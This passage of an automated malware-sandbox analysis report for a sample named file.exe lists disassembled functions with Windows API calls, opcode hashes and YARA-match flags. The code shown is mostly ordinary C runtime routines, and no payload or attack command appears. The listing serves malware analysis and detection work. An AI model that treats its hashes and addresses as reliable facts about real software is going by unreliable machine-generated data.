                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,0042D884,?,?,?,0042D954,0042D955), ref: 049318A2
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,0042D884,?,?,?,0042D954,0042D955), ref: 049318D9
                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 049319EE
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                        • String ID:
                                                        • API String ID: 2123813255-0
                                                        • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                                                        • Instruction ID: 16055c4a021d3d478baf4ec0dba0dd20e8421dbffe8fbf8f6eb6d0d18eeb0810
                                                        • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                                                        • Instruction Fuzzy Hash: D141F9B1E00300ABE7149F749C86B5AB7F8EF4A316F100A39E95AD7290E771BD44C7A1
                                                        APIs
                                                          • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                                          • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                        • GetLastError.KERNEL32 ref: 10007C36
                                                        • __dosmaperr.LIBCMT ref: 10007C3D
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                        • __dosmaperr.LIBCMT ref: 10007C83
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                        • String ID:
                                                        • API String ID: 167067550-0
                                                        • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                        • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                        • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                        • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                        APIs
                                                          • Part of subcall function 049451FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04945462,?,00000000,-00000008), ref: 04945260
                                                        • GetLastError.KERNEL32 ref: 049477AF
                                                        • __dosmaperr.LIBCMT ref: 049477B6
                                                        • GetLastError.KERNEL32(?,?,?,?), ref: 049477F0
                                                        • __dosmaperr.LIBCMT ref: 049477F7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                        • String ID:
                                                        • API String ID: 1913693674-0
                                                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                        • Instruction ID: 3f42cc509b088d0e90a731a7a4ac126032c3f89d29f6cd4533dcb3a4a4075a4e
                                                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                        • Instruction Fuzzy Hash: 60219F71600209AFEB21AFA1C8D0C6BB7ADFFC52787118979E91997250E731FC50CBA0
                                                        APIs
                                                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                                                        • GetLastError.KERNEL32 ref: 00417548
                                                        • __dosmaperr.LIBCMT ref: 0041754F
                                                        • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                                                        • __dosmaperr.LIBCMT ref: 00417590
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                        • String ID:
                                                        • API String ID: 1913693674-0
                                                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                        • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                                                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                        • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                        • Instruction ID: fec3291de11257372792f846d95a96de2c0d2dee6963ecde032b99d5e1ff827b
                                                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                        • Instruction Fuzzy Hash: BE21C071300205AFEB20AF71DC99DBB77AEBFC4268B014935E91A9B150E730FC8087A0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                        • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                                                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                        • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                                                        APIs
                                                        • FreeLibrary.KERNEL32(00000000,?,049436EF,0493381E,?,00000000,04932AA0,04932AA2,?,04943868,00000022,00420B0C,00422950,00422958,04932AA0), ref: 049436A1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                        • Instruction ID: 7ac8437ba04f97455e492d6823a9f0f309c983f6a5be6409435b5a02741009d8
                                                        • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                        • Instruction Fuzzy Hash: BE210231B02612BBC731AF74EC46E5A3B6C9B823A0B114234ED06A73A1EB30FD05C6D4
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 049486F4
                                                          • Part of subcall function 049451FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04945462,?,00000000,-00000008), ref: 04945260
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0494872C
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0494874C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                        • String ID:
                                                        • API String ID: 158306478-0
                                                        • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                        • Instruction ID: 5d5482b3d7dac2a74fe145a59ae765e5de88a1c0242790c3429a2bb693b327b7
                                                        • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                        • Instruction Fuzzy Hash: FB11C0BA6016197F77217BB6DCD8CAF3DADCEC91A83010934F906A1100FA60FE0282B5
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                                                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                        • String ID:
                                                        • API String ID: 158306478-0
                                                        • Opcode ID: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                                        • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                                                        • Opcode Fuzzy Hash: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                                        • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                                        • _free.LIBCMT ref: 10006EFE
                                                        • _free.LIBCMT ref: 10006F34
                                                        • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast_free
                                                        • String ID:
                                                        • API String ID: 2283115069-0
                                                        • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                        • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                                        • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                        • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                                        • _free.LIBCMT ref: 10007055
                                                        • _free.LIBCMT ref: 1000708B
                                                        • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast_free
                                                        • String ID:
                                                        • API String ID: 2283115069-0
                                                        • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                        • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                                        • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                        • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                                        APIs
                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                        • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                          • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                        • ___initconout.LIBCMT ref: 1000CD55
                                                          • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                        • String ID:
                                                        • API String ID: 2744216297-0
                                                        • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                        • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                        • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                        • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                        APIs
                                                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000), ref: 0494CEA6
                                                        • GetLastError.KERNEL32(?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000,00000000,00000000,?,0494A2C8,?), ref: 0494CEB2
                                                          • Part of subcall function 0494CE78: CloseHandle.KERNEL32(0042CA30,0494CEC2,?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000,00000000,00000000), ref: 0494CE88
                                                        • ___initconout.LIBCMT ref: 0494CEC2
                                                          • Part of subcall function 0494CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0494CE69,0494CAF3,00000000,?,04949D25,00000000,00000000,00000000,00000000), ref: 0494CE4D
                                                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000,00000000), ref: 0494CED7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                        • String ID:
                                                        • API String ID: 2744216297-0
                                                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                        • Instruction ID: 0e4df125af275dcc813ada621727d7d5e240c2bdd18a86ce420195b90332a194
                                                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                        • Instruction Fuzzy Hash: 6BF01C36551119BFCF225F95EC08E8A3F26FF886A1B428030FA1996130D7329D219BD4
                                                        APIs
                                                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                                                        • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                                                          • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                                                        • ___initconout.LIBCMT ref: 0041CC5B
                                                          • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                                                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                        • String ID:
                                                        • API String ID: 2744216297-0
                                                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                        • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                                                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                        • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                                                        APIs
                                                        • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                                                        • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                                                        • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                                                        • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                        • String ID:
                                                        • API String ID: 3269011525-0
                                                        • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                                        • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                                                        • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                                        • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                                                        APIs
                                                        • _free.LIBCMT ref: 100067F1
                                                          • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                          • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                        • _free.LIBCMT ref: 10006804
                                                        • _free.LIBCMT ref: 10006815
                                                        • _free.LIBCMT ref: 10006826
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                        • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                                        • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                        • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                                        • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                                                        • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                                        • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                                                        APIs
                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                                                        • String ID: vector too long
                                                        • API String ID: 3646673767-2873823879
                                                        • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                                                        • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                                                        • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                                                        • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: C:\Users\user\Desktop\file.exe
                                                        • API String ID: 0-4010620828
                                                        • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                        • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                                        • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                        • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                                        APIs
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0493BAA6
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0493BB5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 3480331319-1018135373
                                                        • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                        • Instruction ID: 694796231662bcf95a898fde0e2e701fb26c0bc2e67624f3b2fd4797a47625a1
                                                        • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                        • Instruction Fuzzy Hash: 7141A734A002199FDF10DF69C884A9EBBF5AF46319F1481B5E814AB356DB31BA01CB90
                                                        APIs
                                                        • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: EncodePointer
                                                        • String ID: MOC$RCC
                                                        • API String ID: 2118026453-2084237596
                                                        • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                        • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                        • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                        • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                        APIs
                                                        • RtlEncodePointer.NTDLL(00000000), ref: 0493C32C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EncodePointer
                                                        • String ID: MOC$RCC
                                                        • API String ID: 2118026453-2084237596
                                                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                        • Instruction ID: 5e281834ea727d7016924bae745ad42a79e2cfbe063a5ee614a20abbce183676
